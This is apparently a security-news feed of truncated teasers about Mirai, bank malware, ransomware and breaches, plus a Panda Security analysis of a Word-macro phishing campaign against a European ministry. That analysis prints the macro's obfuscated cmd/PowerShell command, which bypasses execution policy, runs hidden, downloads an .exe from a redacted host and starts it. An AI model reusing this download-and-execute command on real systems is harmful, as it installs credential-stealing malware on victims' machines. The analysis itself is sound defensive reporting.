MIRAI – possibly the biggest IoT-based malware threat that emerged last year, which caused vast internet outage in October last year by launching massive distributed denial-of-service (DDoS) attacks against the popular DNS provider Dyn.
Now, the infamous malware has updated itself to boost its distribution efforts.
Researchers from Russian cyber-security firm Dr.Web have now uncovered a
More than a hundred banks and financial institutions across the world have been infected with a dangerous sophisticated, memory-based malware that’s almost undetectable, researchers warned.
Newly published report by the Russian security firm Kaspersky Lab indicates that hackers are targeting banks, telecommunication companies, and government organizations in 40 countries, including the US,
In what considered to be the largest system hack in the country’s history and a massive attack on the financial sector, several banks in Poland have been infected with malware.
What’s surprising? The source of the malware infection is their own financial regulator, the Polish Financial Supervision Authority (KNF) — which, ironically, is meant to keep an eye out for the safety and security of
InterContinental Hotels Group confirmed and released addition details pertaining to a breach that targeted payment card systems used in 12 of its hotels.
Despite open borders, regional variations persist when it comes to malware distribution – and demonstrating good security habits. Take a five-country boost to your security on Safer Internet Day. Is the distribution of malware influenced by borders? Geography plays a continuing role in determining what types of malware people are exposed to but these country […]
The post Borders matter when it comes to malware appeared first on Avira Blog.
Just days before the inauguration of President Donald Trump, cyber criminals infected 70 percent of storage devices that record data from feds surveillance cameras in Washington D.C. in a cyber attack.
Any guess, What kind of virus could have hit the storage devices?
Once again, the culprit is Ransomware, which has become a noxious game of Hackers to get paid effortlessly.
Ransomware is an
Cyberthreats are a constant risk and affect public administrations significantly. So much so that they have become a powerful instrument of aggression against public entities and citizens. They can lead to a serious deterioration in the quality of service, and also, above all, to data leaks concerning everything from personal information to state secrets.
The combination of new technologies and the increase in the complexity of attacks, as well as the professionalization of cybercriminals, is highly dangerous. These are trends that we are predicting for 2017.
Last December, a large-scale spam campaign spanning more than ten countries was carried out, and specifically targeted a major European ministry. The attack, via phishing, was highly advanced and combined social engineering tactics with a powerful Trojan.
The attack is sent by email with an attached Word document. At first, we suspected that it was a targeted attack, since the message came, supposedly, from a healthcare company and the recipient was an employee of the Ministry of Health in a European country.
The present analysis describes the technical features of the harmful code found in the macro of the Word document. The goal of the macro was to download and run another malicious component.
Below are shown a few static properties of the analyzed files.
The hash of the Word document is the following:
MD5: B480B7EFE5E822BD3C3C90D818502068
SHA1: 861ae1beb98704f121e28e57b429972be0410930
According to the document’s metadata, the creation date was 2016-12-19. The malicous code’s signature, downloaded by Word, is the following:
MD5: 3ea61e934c4fb7421087f10cacb14832
SHA1: bffb40c2520e923c7174bbc52767b3b87f7364a9
1. Infection Vectors
The Word document gets to the victim’s computer by way of a spam email coming from a healthcare company. The text tricks the recipient into beleiving that the content is protected and needs to run the macro in order to gain access to it.
According to the data recovered by Panda Security’s Collective Intelligence, this spam campaign took place on December 19, 2016 and affected several countries.
2. Interactions with the infected system
The basic function of the macro consists in downloading and running another malicious code from a URL embedded in the macro itself.
Both the macro and its chains are obfuscated. Also, the macro is designed to run immediately upon being opened.
Part of the obfuscated code contained in the macro
Once the macro is running, the Word doc runs the following command in the system:
cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN (NeW-oBjECt sYstEm.NeT.webcLiENt).DOWNloAdFILE(‘http://xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe’,’C:Users????AppDataRoaming.Exe’);STaRt-PRoCESS ‘C:Users????AppDataRoaming.eXe’
The system symbol (cmd.exe) runs the powershell with two embedded commands going through parameters:
Thanks to the data obtained by the Intelligence Collective at Panda Security, we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family. Panda’s clients were protected proactively, without need of signatures or updates.
The purpose of the malicious code is to steal credentials from browsers and add the compromised machine to bot network. It then waits for commands from the Command & Control Server. These commands come from the cybercriminals that operate it, and is able to download further new malware and carry out all kinds of malicious actions.
Digitization in Public Administration leads to the exponential growth of the creation, storage and management of huge quantities of confidential data — data that does not allow for a single oversight.
The post Malware Capable of Paralyzing an Entire Ministry Neutralized appeared first on Panda Security Mediacenter.
What’s the worst that could happen when a Ransomware hits a Hotel?
Recently, hundreds of guests of a luxurious hotel in Austria were locked in or out of their rooms when ransomware hit the hotel’s IT system, and the hotel had no choice left except paying the attackers.
Today, we are living in a digital age that is creating a digital headache for people and organizations around the world with
Dridex banking malware returns with a new bypass technique that allows the malware to execute without triggering a Windows UAC alert to the user.
The Star Wars Twitter botnet, the return of Lavabit, a critical Cisco Webex flaw, and the St. Louis Library ransomware story are discussed.
